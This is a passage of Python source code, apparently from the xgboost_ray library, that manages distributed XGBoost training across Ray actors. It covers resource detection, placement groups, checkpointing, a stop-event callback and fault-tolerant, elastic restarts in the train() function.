if isinstance(param["data"], list):
dm_param = {
"data": concat_dataframes(param["data"]),
"label": concat_dataframes(param["label"]),
"weight": concat_dataframes(param["weight"]),
"qid": concat_dataframes(param["qid"]),
"base_margin": concat_dataframes(param["base_margin"]),
"label_lower_bound": concat_dataframes(
param["label_lower_bound"]),
"label_upper_bound": concat_dataframes(
param["label_upper_bound"]),
}
param.update(dm_param)
ll = param.pop("label_lower_bound", None)
lu = param.pop("label_upper_bound", None)
if LEGACY_MATRIX:
param.pop("base_margin", None)
if "qid" not in inspect.signature(xgb.DMatrix).parameters:
param.pop("qid", None)
matrix = xgb.DMatrix(**param)
if not LEGACY_MATRIX:
matrix.set_info(label_lower_bound=ll, label_upper_bound=lu)
data.update_matrix_properties(matrix)
return matrix
@PublicAPI(stability="beta")
@dataclass
class RayParams:
"""Parameters to configure Ray-specific behavior.
Args:
num_actors (int): Number of parallel Ray actors.
cpus_per_actor (int): Number of CPUs to be used per Ray actor.
gpus_per_actor (int): Number of GPUs to be used per Ray actor.
resources_per_actor (Optional[Dict]): Dict of additional resources
required per Ray actor.
elastic_training (bool): If True, training will continue with
fewer actors if an actor fails. Default False.
max_failed_actors (int): If `elastic_training` is True, this
specifies the maximum number of failed actors with which
we still continue training.
max_actor_restarts (int): Number of retries when Ray actors fail.
Defaults to 0 (no retries). Set to -1 for unlimited retries.
checkpoint_frequency (int): How often to save checkpoints. Defaults
to ``5`` (every 5th iteration).
"""
# Actor scheduling
num_actors: int = 0
cpus_per_actor: int = 0
gpus_per_actor: int = -1
resources_per_actor: Optional[Dict] = None
# Fault tolerance
elastic_training: bool = False
max_failed_actors: int = 0
max_actor_restarts: int = 0
checkpoint_frequency: int = 5
# Distributed callbacks
distributed_callbacks: Optional[List[DistributedCallback]] = None
def get_tune_resources(self):
"""Return the resources to use for xgboost_ray training with Tune."""
if self.cpus_per_actor <= 0 or self.num_actors <= 0:
raise ValueError("num_actors and cpus_per_actor both must be "
"greater than 0.")
return _get_tune_resources(
num_actors=self.num_actors,
cpus_per_actor=self.cpus_per_actor,
gpus_per_actor=max(0, self.gpus_per_actor),
resources_per_actor=self.resources_per_actor)
@dataclass
class _Checkpoint:
iteration: int = 0
value: Optional[bytes] = None
def _validate_ray_params(ray_params: Union[None, RayParams, dict]) \
-> RayParams:
if ray_params is None:
ray_params = RayParams()
elif isinstance(ray_params, dict):
ray_params = RayParams(**ray_params)
elif not isinstance(ray_params, RayParams):
raise ValueError(
f"`ray_params` must be a `RayParams` instance, a dict, or None, "
f"but it was {type(ray_params)}."
f"\nFIX THIS preferably by passing a `RayParams` instance as "
f"the `ray_params` parameter.")
if ray_params.num_actors <= 0:
raise ValueError(
"The `num_actors` parameter is set to 0. Please always specify "
"the number of distributed actors you want to use."
"\nFIX THIS by passing a `RayParams(num_actors=X)` argument "
"to your call to xgboost_ray.")
elif ray_params.num_actors < 2:
warnings.warn(
f"`num_actors` in `ray_params` is smaller than 2 "
f"({ray_params.num_actors}). XGBoost will NOT be distributed!")
return ray_params
@DeveloperAPI
class RayXGBoostActor:
"""Remote Ray XGBoost actor class.
This remote actor handles local training and prediction of one data
shard. It initializes a Rabit context, thus connecting to the Rabit
all-reduce ring, and initializes local training, sending updates
to other workers.
The actor with rank 0 also checkpoints the model periodically and
sends the checkpoint back to the driver.
Args:
rank (int): Rank of the actor. Must be ``0 <= rank < num_actors``.
num_actors (int): Total number of actors.
queue (Queue): Ray queue to communicate with main process.
checkpoint_frequency (int): How often to store checkpoints. Defaults
to ``5``, saving checkpoints every 5 boosting rounds.
"""
def __init__(
self,
rank: int,
num_actors: int,
queue: Optional[Queue] = None,
stop_event: Optional[Event] = None,
checkpoint_frequency: int = 5,
distributed_callbacks: Optional[List[DistributedCallback]] = None):
self.queue = queue
init_session(rank, self.queue)
self.rank = rank
self.num_actors = num_actors
self.checkpoint_frequency = checkpoint_frequency
self._data: Dict[RayDMatrix, xgb.DMatrix] = {}
self._local_n: Dict[RayDMatrix, int] = {}
self._stop_event = stop_event
self._distributed_callbacks = DistributedCallbackContainer(
distributed_callbacks)
self._distributed_callbacks.on_init(self)
_set_omp_num_threads()
logger.debug(f"Initialized remote XGBoost actor with rank {self.rank}")
def set_queue(self, queue: Queue):
self.queue = queue
set_session_queue(self.queue)
def set_stop_event(self, stop_event: Event):
self._stop_event = stop_event
def _get_stop_event(self):
return self._stop_event
def pid(self):
"""Get process PID. Used for checking if still alive"""
return os.getpid()
def ip(self):
"""Get node IP address."""
return get_node_ip_address()
def _save_checkpoint_callback(self):
"""Send checkpoints to driver"""
this = self
class _SaveInternalCheckpointCallback(TrainingCallback):
def after_iteration(self, model, epoch, evals_log):
if xgb.rabit.get_rank() == 0 and \
epoch % this.checkpoint_frequency == 0:
put_queue(_Checkpoint(epoch, pickle.dumps(model)))
def after_training(self, model):
if xgb.rabit.get_rank() == 0:
put_queue(_Checkpoint(-1, pickle.dumps(model)))
return model
return _SaveInternalCheckpointCallback()
def _stop_callback(self):
"""Stop if event is set"""
this = self
# Keep track of initial stop event. Since we're training in a thread,
# the stop event might be overwritten, which should he handled
# as if the previous stop event was set.
initial_stop_event = self._stop_event
class _StopCallback(TrainingCallback):
def after_iteration(self, model, epoch, evals_log):
try:
if this._stop_event.is_set() or \
this._get_stop_event() is not initial_stop_event:
if LEGACY_CALLBACK:
raise EarlyStopException(epoch)
# Returning True stops training
return True
except RayActorError:
if LEGACY_CALLBACK:
raise EarlyStopException(epoch)
return True
return _StopCallback()
def load_data(self, data: RayDMatrix):
if data in self._data:
return
self._distributed_callbacks.before_data_loading(self, data)
param = data.get_data(self.rank, self.num_actors)
if isinstance(param["data"], list):
self._local_n[data] = sum(len(a) for a in param["data"])
else:
self._local_n[data] = len(param["data"])
self._data[data] = param
self._distributed_callbacks.after_data_loading(self, data)
def train(self, rabit_args: List[str], return_bst: bool,
params: Dict[str, Any], dtrain: RayDMatrix,
evals: Tuple[RayDMatrix, str], *args,
**kwargs) -> Dict[str, Any]:
self._distributed_callbacks.before_train(self)
num_threads = _set_omp_num_threads()
local_params = params.copy()
if "xgb_model" in kwargs:
if isinstance(kwargs["xgb_model"], bytes):
# bytearray type gets lost in remote actor call
kwargs["xgb_model"] = bytearray(kwargs["xgb_model"])
if "nthread" not in local_params and "n_jobs" not in local_params:
if num_threads > 0:
local_params["nthread"] = num_threads
local_params["n_jobs"] = num_threads
else:
local_params["nthread"] = sum(
num
for _, num in ray.worker.get_resource_ids().get("CPU", []))
local_params["n_jobs"] = local_params["nthread"]
if dtrain not in self._data:
self.load_data(dtrain)
for deval, _name in evals:
if deval not in self._data:
self.load_data(deval)
evals_result = dict()
if "callbacks" in kwargs:
callbacks = kwargs["callbacks"] or []
else:
callbacks = []
callbacks.append(self._save_checkpoint_callback())
callbacks.append(self._stop_callback())
kwargs["callbacks"] = callbacks
result_dict = {}
error_dict = {}
# We run xgb.train in a thread to be able to react to the stop event.
def _train():
try:
with _RabitContext(str(id(self)), rabit_args):
local_dtrain = _get_dmatrix(dtrain, self._data[dtrain])
if not local_dtrain.get_label().size:
raise RuntimeError(
"Training data has no label set. Please make sure "
"to set the `label` argument when initializing "
"`RayDMatrix()` for data you would like "
"to train on.")
local_evals = []
for deval, name in evals:
local_evals.append((_get_dmatrix(
deval, self._data[deval]), name))
if LEGACY_CALLBACK:
for xgb_callback in kwargs.get("callbacks", []):
if isinstance(xgb_callback, TrainingCallback):
xgb_callback.before_training(None)
bst = xgb.train(
local_params,
local_dtrain,
*args,
evals=local_evals,
evals_result=evals_result,
**kwargs)
if LEGACY_CALLBACK:
for xgb_callback in kwargs.get("callbacks", []):
if isinstance(xgb_callback, TrainingCallback):
xgb_callback.after_training(bst)
result_dict.update({
"bst": bst,
"evals_result": evals_result,
"train_n": self._local_n[dtrain]
})
except EarlyStopException:
# Usually this should be caught by XGBoost core.
# Silent fail, will be raised as RayXGBoostTrainingStopped.
return
except XGBoostError as e:
error_dict.update({"exception": e})
return
thread = threading.Thread(target=_train)
thread.daemon = True
thread.start()
while thread.is_alive():
thread.join(timeout=0)
if self._stop_event.is_set():
raise RayXGBoostTrainingStopped("Training was interrupted.")
time.sleep(0.1)
if not result_dict:
raise_from = error_dict.get("exception", None)
raise RayXGBoostTrainingError("Training failed.") from raise_from
thread.join()
self._distributed_callbacks.after_train(self, result_dict)
if not return_bst:
result_dict.pop("bst", None)
return result_dict
def predict(self, model: xgb.Booster, data: RayDMatrix, **kwargs):
self._distributed_callbacks.before_predict(self)
_set_omp_num_threads()
if data not in self._data:
self.load_data(data)
local_data = _get_dmatrix(data, self._data[data])
predictions = model.predict(local_data, **kwargs)
if predictions.ndim == 1:
callback_predictions = pd.Series(predictions)
else:
callback_predictions = pd.DataFrame(predictions)
self._distributed_callbacks.after_predict(self, callback_predictions)
return predictions
@ray.remote
class _RemoteRayXGBoostActor(RayXGBoostActor):
pass
class _PrepareActorTask(MultiActorTask):
def __init__(self, actor: ActorHandle, queue: Queue, stop_event: Event,
load_data: List[RayDMatrix]):
futures = []
futures.append(actor.set_queue.remote(queue))
futures.append(actor.set_stop_event.remote(stop_event))
for data in load_data:
futures.append(actor.load_data.remote(data))
super(_PrepareActorTask, self).__init__(futures)
def _autodetect_resources(ray_params: RayParams,
use_tree_method: bool = False) -> Tuple[int, int]:
gpus_per_actor = ray_params.gpus_per_actor
cpus_per_actor = ray_params.cpus_per_actor
# Automatically set gpus_per_actor if left at the default value
if gpus_per_actor == -1:
gpus_per_actor = 0
if use_tree_method:
gpus_per_actor = 1
# Automatically set cpus_per_actor if left at the default value
# Will be set to the number of cluster CPUs divided by the number of
# actors, bounded by the minimum number of CPUs across actors nodes.
if cpus_per_actor <= 0:
cluster_cpus = _ray_get_cluster_cpus() or 1
cpus_per_actor = max(
1,
min(
int(_get_min_node_cpus() or 1),
int(cluster_cpus // ray_params.num_actors)))
return cpus_per_actor, gpus_per_actor
def _create_actor(
rank: int,
num_actors: int,
num_cpus_per_actor: int,
num_gpus_per_actor: int,
resources_per_actor: Optional[Dict] = None,
placement_group: Optional[PlacementGroup] = None,
queue: Optional[Queue] = None,
checkpoint_frequency: int = 5,
distributed_callbacks: Optional[Sequence[DistributedCallback]] = None
) -> ActorHandle:
# Send DEFAULT_PG here, which changed in Ray >= 1.5.0
# If we send `None`, this will ignore the parent placement group and
# lead to errors e.g. when used within Ray Tune
return _RemoteRayXGBoostActor.options(
num_cpus=num_cpus_per_actor,
num_gpus=num_gpus_per_actor,
resources=resources_per_actor,
placement_group_capture_child_tasks=True,
placement_group=placement_group or DEFAULT_PG).remote(
rank=rank,
num_actors=num_actors,
queue=queue,
checkpoint_frequency=checkpoint_frequency,
distributed_callbacks=distributed_callbacks)
def _trigger_data_load(actor, dtrain, evals):
wait_load = [actor.load_data.remote(dtrain)]
for deval, _name in evals:
wait_load.append(actor.load_data.remote(deval))
return wait_load
def _handle_queue(queue: Queue, checkpoint: _Checkpoint,
callback_returns: Dict):
"""Handle results obtained from workers through the remote Queue object.
Remote actors supply these results via the
``xgboost_ray.session.put_queue()`` function. These can be:
- Callables. These will be called immediately with no arguments.
- ``_Checkpoint`` objects. These will update the latest checkpoint
object on the driver.
- Any other type. These will be appended to an actor rank-specific
``callback_returns`` dict that will be written to the
``additional_returns`` dict of the :func:`train() <train>` method.
"""
while not queue.empty():
(actor_rank, item) = queue.get()
if isinstance(item, Callable):
item()
elif isinstance(item, _Checkpoint):
checkpoint.__dict__.update(item.__dict__)
else:
callback_returns[actor_rank].append(item)
def _shutdown(actors: List[ActorHandle],
pending_actors: Optional[Dict[int, Tuple[
ActorHandle, _PrepareActorTask]]] = None,
queue: Optional[Queue] = None,
event: Optional[Event] = None,
placement_group: Optional[PlacementGroup] = None,
force: bool = False):
alive_actors = [a for a in actors if a is not None]
if pending_actors:
alive_actors += [a for (a, _) in pending_actors.values()]
if force:
for actor in alive_actors:
ray.kill(actor)
else:
done_refs = [a.__ray_terminate__.remote() for a in alive_actors]
# Wait 5 seconds for actors to die gracefully.
done, not_done = ray.wait(done_refs, timeout=5)
if not_done:
# If all actors are not able to die gracefully, then kill them.
for actor in alive_actors:
ray.kill(actor)
for i in range(len(actors)):
actors[i] = None
if queue:
queue.shutdown()
if event:
event.shutdown()
if placement_group:
remove_placement_group(placement_group)
def _create_placement_group(cpus_per_actor, gpus_per_actor,
resources_per_actor, num_actors, strategy):
resources_per_bundle = {"CPU": cpus_per_actor, "GPU": gpus_per_actor}
extra_resources_per_bundle = {} if resources_per_actor is None else \
resources_per_actor
# Create placement group for training worker colocation.
bundles = [{
**resources_per_bundle,
**extra_resources_per_bundle
} for _ in range(num_actors)]
pg = placement_group(bundles, strategy=strategy)
# Wait for placement group to get created.
logger.debug("Waiting for placement group to start.")
ready, _ = ray.wait([pg.ready()], timeout=ENV.PLACEMENT_GROUP_TIMEOUT_S)
if ready:
logger.debug("Placement group has started.")
else:
raise TimeoutError("Placement group creation timed out. Make sure "
"your cluster either has enough resources or use "
"an autoscaling cluster. Current resources "
"available: {}, resources requested by the "
"placement group: {}".format(
ray.available_resources(), pg.bundle_specs))
return pg
def _create_communication_processes(added_tune_callback: bool = False):
# Create Queue and Event actors and make sure to colocate with driver node.
node_ip = get_node_ip_address()
# Have to explicitly set num_cpus to 0.
placement_option = {"num_cpus": 0}
if added_tune_callback and TUNE_USING_PG:
# If Tune is using placement groups, then we force Queue and
# StopEvent onto same bundle as the Trainable.
# This forces all 3 to be on the same node.
current_pg = get_current_placement_group()
if current_pg is None:
# This means the user is not using Tune PGs after all -
# e.g. via setting an environment variable.
placement_option.update({"resources": {f"node:{node_ip}": 0.01}})
else:
placement_option.update({
"placement_group": current_pg,
"placement_group_bundle_index": 0
})
else:
placement_option.update({"resources": {f"node:{node_ip}": 0.01}})
queue = Queue(actor_options=placement_option) # Queue actor
stop_event = Event(actor_options=placement_option) # Stop event actor
return queue, stop_event
def _validate_kwargs_for_func(kwargs: Dict[str, Any], func: Callable,
func_name: str):
"""Raise exception if kwargs are not valid for a given function."""
sig = inspect.signature(func)
try:
sig.bind_partial(**kwargs)
except TypeError as e:
# Try to find set of invalid kwargs
valid_keys = inspect.getfullargspec(func)[0]
invalid_kwargs = [k for k in kwargs if k not in valid_keys]
raise TypeError(
f"Got invalid keyword arguments to be passed to `{func_name}`. "
f"Please check these arguments: {invalid_kwargs}") from e
@dataclass
class _TrainingState:
actors: List[Optional[ActorHandle]]
queue: Queue
stop_event: Event
checkpoint: _Checkpoint
additional_results: Dict
training_started_at: float = 0.
placement_group: Optional[PlacementGroup] = None
failed_actor_ranks: set = field(default_factory=set)
# Last time we checked resources to schedule new actors
last_resource_check_at: float = 0
pending_actors: Dict[int, Tuple[ActorHandle, _PrepareActorTask]] = field(
default_factory=dict)
restart_training_at: Optional[float] = None
def _train(params: Dict,
dtrain: RayDMatrix,
*args,
evals=(),
ray_params: RayParams,
cpus_per_actor: int,
gpus_per_actor: int,
_training_state: _TrainingState,
**kwargs) -> Tuple[xgb.Booster, Dict, Dict]:
"""This is the local train function wrapped by :func:`train() <train>`.
This function can be thought of one invocation of a multi-actor xgboost
training run. It starts the required number of actors, triggers data
loading, collects the results, and handles (i.e. registers) actor failures
- but it does not handle fault tolerance or general training setup.
Generally, this function is called one or multiple times by the
:func:`train() <train>` function. It is called exactly once if no
errors occur. It is called more than once if errors occurred (e.g. an
actor died) and failure handling is enabled.
"""
from xgboost_ray.elastic import _maybe_schedule_new_actors, \
_update_scheduled_actor_states, _get_actor_alive_status
# Un-schedule possible scheduled restarts
_training_state.restart_training_at = None
if "nthread" in params or "n_jobs" in params:
if ("nthread" in params and params["nthread"] > cpus_per_actor) or (
"n_jobs" in params and params["n_jobs"] > cpus_per_actor):
raise ValueError(
"Specified number of threads greater than number of CPUs. "
"\nFIX THIS by passing a lower value for the `nthread` "
"parameter or a higher number for `cpus_per_actor`.")
else:
params["nthread"] = cpus_per_actor
params["n_jobs"] = cpus_per_actor
# This is a callback that handles actor failures.
# We identify the rank of the failed actor, add this to a set of
# failed actors (which we might want to restart later), and set its
# entry in the actor list to None.
def handle_actor_failure(actor_id):
rank = _training_state.actors.index(actor_id)
_training_state.failed_actor_ranks.add(rank)
_training_state.actors[rank] = None
# Here we create new actors. In the first invocation of _train(), this
# will be all actors. In future invocations, this may be less than
# the num_actors setting, depending on the failure mode.
newly_created = 0
for i in list(_training_state.failed_actor_ranks):
if _training_state.actors[i] is not None:
raise RuntimeError(
f"Trying to create actor with rank {i}, but it already "
f"exists.")
actor = _create_actor(
rank=i,
num_actors=ray_params.num_actors,
num_cpus_per_actor=cpus_per_actor,
num_gpus_per_actor=gpus_per_actor,
resources_per_actor=ray_params.resources_per_actor,
placement_group=_training_state.placement_group,
queue=_training_state.queue,
checkpoint_frequency=ray_params.checkpoint_frequency,
distributed_callbacks=ray_params.distributed_callbacks)
# Set actor entry in our list
_training_state.actors[i] = actor
# Remove from this set so it is not created again
_training_state.failed_actor_ranks.remove(i)
newly_created += 1
alive_actors = sum(1 for a in _training_state.actors if a is not None)
logger.info(f"[RayXGBoost] Created {newly_created} new actors "
f"({alive_actors} total actors). Waiting until actors "
f"are ready for training.")
# For distributed datasets (e.g. Modin), this will initialize
# (and fix) the assignment of data shards to actor ranks
dtrain.assert_enough_shards_for_actors(num_actors=ray_params.num_actors)
dtrain.assign_shards_to_actors(_training_state.actors)
for deval, _ in evals:
deval.assert_enough_shards_for_actors(num_actors=ray_params.num_actors)
deval.assign_shards_to_actors(_training_state.actors)
load_data = [dtrain] + [eval[0] for eval in evals]
prepare_actor_tasks = [
_PrepareActorTask(
actor,
# Maybe we got a new Queue actor, so send it to all actors.
queue=_training_state.queue,
# Maybe we got a new Event actor, so send it to all actors.
stop_event=_training_state.stop_event,
# Trigger data loading
load_data=load_data) for actor in _training_state.actors
if actor is not None
]
start_wait = time.time()
last_status = start_wait
try:
# Construct list before calling any() to force evaluation
ready_states = [task.is_ready() for task in prepare_actor_tasks]
while not all(ready_states):
if time.time() >= last_status + ENV.STATUS_FREQUENCY_S:
wait_time = time.time() - start_wait
logger.info(f"Waiting until actors are ready "
f"({wait_time:.0f} seconds passed).")
last_status = time.time()
time.sleep(0.1)
ready_states = [task.is_ready() for task in prepare_actor_tasks]
except Exception as exc:
_training_state.stop_event.set()
_get_actor_alive_status(_training_state.actors, handle_actor_failure)
raise RayActorError from exc
logger.info("[RayXGBoost] Starting XGBoost training.")
# Start Rabit tracker for gradient sharing
rabit_process, env = _start_rabit_tracker(alive_actors)
rabit_args = [("%s=%s" % item).encode() for item in env.items()]
# Load checkpoint if we have one. In that case we need to adjust the
# number of training rounds.
if _training_state.checkpoint.value:
kwargs["xgb_model"] = pickle.loads(_training_state.checkpoint.value)
if _training_state.checkpoint.iteration == -1:
# -1 means training already finished.
logger.error(
"Trying to load continue from checkpoint, but the checkpoint"
"indicates training already finished. Returning last"
"checkpointed model instead.")
return kwargs["xgb_model"], {}, _training_state.additional_results
# The callback_returns dict contains actor-rank indexed lists of
# results obtained through the `put_queue` function, usually
# sent via callbacks.
callback_returns = _training_state.additional_results.get(
"callback_returns")
if callback_returns is None:
callback_returns = [list() for _ in range(len(_training_state.actors))]
_training_state.additional_results[
"callback_returns"] = callback_returns
_training_state.training_started_at = time.time()
# Trigger the train function
live_actors = [
actor for actor in _training_state.actors if actor is not None
]
training_futures = [
actor.train.remote(
rabit_args,
i == 0, # return_bst
params,
dtrain,
evals,
*args,
**kwargs) for i, actor in enumerate(live_actors)
]
# Failure handling loop. Here we wait until all training tasks finished.
# If a training task fails, we stop training on the remaining actors,
# check which ones are still alive, and raise the error.
# The train() wrapper function will then handle the error.
start_wait = time.time()
last_status = start_wait
try:
not_ready = training_futures
while not_ready:
if _training_state.queue:
_handle_queue(
queue=_training_state.queue,
checkpoint=_training_state.checkpoint,
callback_returns=callback_returns)
if ray_params.elastic_training \
and not ENV.ELASTIC_RESTART_DISABLED:
_maybe_schedule_new_actors(
training_state=_training_state,
num_cpus_per_actor=cpus_per_actor,
num_gpus_per_actor=gpus_per_actor,
resources_per_actor=ray_params.resources_per_actor,
ray_params=ray_params,
load_data=load_data)
# This may raise RayXGBoostActorAvailable
_update_scheduled_actor_states(_training_state)
if time.time() >= last_status + ENV.STATUS_FREQUENCY_S:
wait_time = time.time() - start_wait
logger.info(f"Training in progress "
f"({wait_time:.0f} seconds since last restart).")
last_status = time.time()
ready, not_ready = ray.wait(
not_ready, num_returns=len(not_ready), timeout=1)
ray.get(ready)
# Get items from queue one last time
if _training_state.queue:
_handle_queue(
queue=_training_state.queue,
checkpoint=_training_state.checkpoint,
callback_returns=callback_returns)
# The inner loop should catch all exceptions
except Exception as exc:
logger.debug(f"Caught exception in training loop: {exc}")
# Stop all other actors from training
_training_state.stop_event.set()
# Check which actors are still alive
_get_actor_alive_status(_training_state.actors, handle_actor_failure)
# Todo: Try to fetch newer checkpoint, store in `_checkpoint`
# Shut down rabit
_stop_rabit_tracker(rabit_process)
raise RayActorError from exc
# Training is now complete.
# Stop Rabit tracking process
_stop_rabit_tracker(rabit_process)
# Get all results from all actors.
all_results: List[Dict[str, Any]] = ray.get(training_futures)
# All results should be the same because of Rabit tracking. But only
# the first one actually returns its bst object.
bst = all_results[0]["bst"]
evals_result = all_results[0]["evals_result"]
if callback_returns:
_training_state.additional_results[
"callback_returns"] = callback_returns
total_n = sum(res["train_n"] or 0 for res in all_results)
_training_state.additional_results["total_n"] = total_n
return bst, evals_result, _training_state.additional_results
@PublicAPI(stability="beta")
def train(
params: Dict,
dtrain: RayDMatrix,
num_boost_round: int = 10,
*args,
evals: Union[List[Tuple[RayDMatrix, str]], Tuple[RayDMatrix, str]] = (
),
evals_result: Optional[Dict] = None,
additional_results: Optional[Dict] = None,
ray_params: Union[None, RayParams, Dict] = None,
_remote: Optional[bool] = None,
**kwargs) -> xgb.Booster:
"""Distributed XGBoost training via Ray.
This function will connect to a Ray cluster, create ``num_actors``
remote actors, send data shards to them, and have them train an
XGBoost classifier. The XGBoost parameters will be shared and combined
via Rabit's all-reduce protocol.
If running inside a Ray Tune session, this function will automatically
handle results to tune for hyperparameter search.
Failure handling:
XGBoost on Ray supports automatic failure handling that can be configured
with the :class:`ray_params <RayParams>` argument. If an actor or local
training task dies, the Ray actor is marked as dead, and there are
three options on how to proceed.
First, if ``ray_params.elastic_training`` is ``True`` and
the number of dead actors is below ``ray_params.max_failed_actors``,
training will continue right away with fewer actors. No data will be
loaded again and the latest available checkpoint will be used.
A maximum of ``ray_params.max_actor_restarts`` restarts will be tried
before exiting.
Second, if ``ray_params.elastic_training`` is ``False`` and
the number of restarts is below ``ray_params.max_actor_restarts``,
Ray will try to schedule the dead actor again, load the data shard
on this actor, and then continue training from the latest checkpoint.
Third, if none of the above is the case, training is aborted.
Args:
params (Dict): parameter dict passed to ``xgboost.train()``
dtrain (RayDMatrix): Data object containing the training data.
evals (Union[List[Tuple[RayDMatrix, str]], Tuple[RayDMatrix, str]]):
``evals`` tuple passed to ``xgboost.train()``.
evals_result (Optional[Dict]): Dict to store evaluation results in.
additional_results (Optional[Dict]): Dict to store additional results.
ray_params (Union[None, RayParams, Dict]): Parameters to configure
Ray-specific behavior. See :class:`RayParams` for a list of valid
configuration parameters.
_remote (bool): Whether to run the driver process in a remote
function. This is enabled by default in Ray client mode.
**kwargs: Keyword arguments will be passed to the local
`xgb.train()` calls.
Returns: An ``xgboost.Booster`` object.
"""
os.environ.setdefault("RAY_IGNORE_UNHANDLED_ERRORS", "1")
if xgb is None:
raise ImportError(
"xgboost package is not installed. XGBoost-Ray WILL NOT WORK. "
"FIX THIS by running `pip install \"xgboost-ray\"`.")
if _remote is None:
_remote = _is_client_connected() and \
not is_session_enabled()
if not ray.is_initialized():
ray.init()
if _remote:
# Run this function as a remote function to support Ray client mode.
@ray.remote(num_cpus=0)
def _wrapped(*args, **kwargs):
_evals_result = {}
_additional_results = {}
bst = train(
*args,
num_boost_round=num_boost_round,
evals_result=_evals_result,
additional_results=_additional_results,
**kwargs)
return bst, _evals_result, _additional_results
# Make sure that train is called on the server node.
_wrapped = force_on_current_node(_wrapped)
bst, train_evals_result, train_additional_results = ray.get(
_wrapped.remote(
params,
dtrain,
*args,
evals=evals,
ray_params=ray_params,
_remote=False,
**kwargs,
))
if isinstance(evals_result, dict):
evals_result.update(train_evals_result)
if isinstance(additional_results, dict):
additional_results.update(train_additional_results)
return bst
_maybe_print_legacy_warning()
# may raise TypeError
_validate_kwargs_for_func(kwargs, xgb.train, "xgb.train()")
start_time = time.time()
ray_params = _validate_ray_params(ray_params)
max_actor_restarts = ray_params.max_actor_restarts \
if ray_params.max_actor_restarts >= 0 else float("inf")
_assert_ray_support()
if not isinstance(dtrain, RayDMatrix):
raise ValueError(
"The `dtrain` argument passed to `train()` is not a RayDMatrix, "
"but of type {}. "
"\nFIX THIS by instantiating a RayDMatrix first: "
"`dtrain = RayDMatrix(data=data, label=label)`.".format(
type(dtrain)))
added_tune_callback = _try_add_tune_callback(kwargs)
# Tune currently does not support elastic training.
if added_tune_callback and ray_params.elastic_training and not bool(
os.getenv("RXGB_ALLOW_ELASTIC_TUNE", "0")):
raise ValueError("Elastic Training cannot be used with Ray Tune. "
"Please disable elastic_training in RayParams in "
"order to use xgboost_ray with Tune.")
if added_tune_callback:
# Don't autodetect resources when used with Tune.
cpus_per_actor = ray_params.cpus_per_actor
gpus_per_actor = max(0, ray_params.gpus_per_actor)
else:
cpus_per_actor, gpus_per_actor = _autodetect_resources(
ray_params=ray_params,
use_tree_method="tree_method" in params
and params["tree_method"] is not None
and params["tree_method"].startswith("gpu"))
tree_method = params.get("tree_method", "auto") or "auto"
# preemptively raise exceptions with bad params
if tree_method == "exact":
raise ValueError(
"`exact` tree method doesn't support distributed training.")
if params.get("updater", None) == "grow_colmaker":
raise ValueError(
"`grow_colmaker` updater doesn't support distributed training.")
if gpus_per_actor > 0 and not tree_method.startswith("gpu_"):
warnings.warn(
f"GPUs have been assigned to the actors, but the current XGBoost "
f"tree method is set to `{tree_method}`. Thus, GPUs will "
f"currently not be used. To enable GPUs usage, please set the "
f"`tree_method` to a GPU-compatible option, "
f"e.g. `gpu_hist`.")
if gpus_per_actor == 0 and cpus_per_actor == 0:
raise ValueError("cpus_per_actor and gpus_per_actor both cannot be "
"0. Are you sure your cluster has CPUs available?")
if ray_params.elastic_training and ray_params.max_failed_actors == 0:
raise ValueError(
"Elastic training enabled but the maximum number of failed "
"actors is set to 0. This means that elastic training is "
"effectively disabled. Please set `RayParams.max_failed_actors` "
"to something larger than 0 to enable elastic training.")
if ray_params.elastic_training and ray_params.max_actor_restarts == 0:
raise ValueError(
"Elastic training enabled but the maximum number of actor "
"restarts is set to 0. This means that elastic training is "
"effectively disabled. Please set `RayParams.max_actor_restarts` "
"to something larger than 0 to enable elastic training.")
if not dtrain.has_label:
raise ValueError(
"Training data has no label set. Please make sure to set "
"the `label` argument when initializing `RayDMatrix()` "
"for data you would like to train on.")
if not dtrain.loaded and not dtrain.distributed:
dtrain.load_data(ray_params.num_actors)
for (deval, _name) in evals:
if not deval.has_label:
raise ValueError(
"Evaluation data has no label set. Please make sure to set "
"the `label` argument when initializing `RayDMatrix()` "
"for data you would like to evaluate on.")
if not deval.loaded and not deval.distributed:
deval.load_data(ray_params.num_actors)
bst = None
train_evals_result = {}
train_additional_results = {}
tries = 0
checkpoint = _Checkpoint() # Keep track of latest checkpoint
current_results = {} # Keep track of additional results
actors = [None] * ray_params.num_actors # All active actors
pending_actors = {}
# Create the Queue and Event actors.
queue, stop_event = _create_communication_processes(added_tune_callback)
placement_strategy = None
if not ray_params.elastic_training:
if added_tune_callback:
if TUNE_USING_PG:
# If Tune is using placement groups, then strategy has already
# been set. Don't create an additional placement_group here.
placement_strategy = None
else:
placement_strategy = "PACK"
elif bool(ENV.USE_SPREAD_STRATEGY):
placement_strategy = "SPREAD"
if placement_strategy is not None:
pg = _create_placement_group(cpus_per_actor, gpus_per_actor,
ray_params.resources_per_actor,
ray_params.num_actors, placement_strategy)
else:
pg = None
start_actor_ranks = set(range(ray_params.num_actors)) # Start these
total_training_time = 0.
boost_rounds_left = num_boost_round
last_checkpoint_value = checkpoint.value
while tries <= max_actor_restarts:
# Only update number of iterations if the checkpoint changed
# If it didn't change, we already subtracted the iterations.
if checkpoint.iteration >= 0 and \
checkpoint.value != last_checkpoint_value:
boost_rounds_left -= checkpoint.iteration + 1
last_checkpoint_value = checkpoint.value
logger.debug(f"Boost rounds left: {boost_rounds_left}")
training_state = _TrainingState(
actors=actors,
queue=queue,
stop_event=stop_event,
checkpoint=checkpoint,
additional_results=current_results,
training_started_at=0.,
placement_group=pg,
failed_actor_ranks=start_actor_ranks,
pending_actors=pending_actors)
try:
bst, train_evals_result, train_additional_results = _train(
params,
dtrain,
boost_rounds_left,
*args,
evals=evals,
ray_params=ray_params,
cpus_per_actor=cpus_per_actor,
gpus_per_actor=gpus_per_actor,
_training_state=training_state,
**kwargs)
if training_state.training_started_at > 0.:
total_training_time += time.time(
) - training_state.training_started_at
break
except (RayActorError, RayTaskError) as exc:
if training_state.training_started_at > 0.:
total_training_time += time.time(
) - training_state.training_started_at
alive_actors = sum(1 for a in actors if a is not None)
start_again = False
if ray_params.elastic_training:
if alive_actors < ray_params.num_actors - \
ray_params.max_failed_actors:
raise RuntimeError(
"A Ray actor died during training and the maximum "
"number of dead actors in elastic training was "
"reached. Shutting down training.") from exc
# Do not start new actors before resuming training
# (this might still restart actors during training)
start_actor_ranks.clear()
if exc.__cause__ and isinstance(exc.__cause__,
RayXGBoostActorAvailable):
# New actor available, integrate into training loop
logger.info(
f"A new actor became available. Re-starting training "
f"from latest checkpoint with new actor. "
f"This will use {alive_actors} existing actors and "
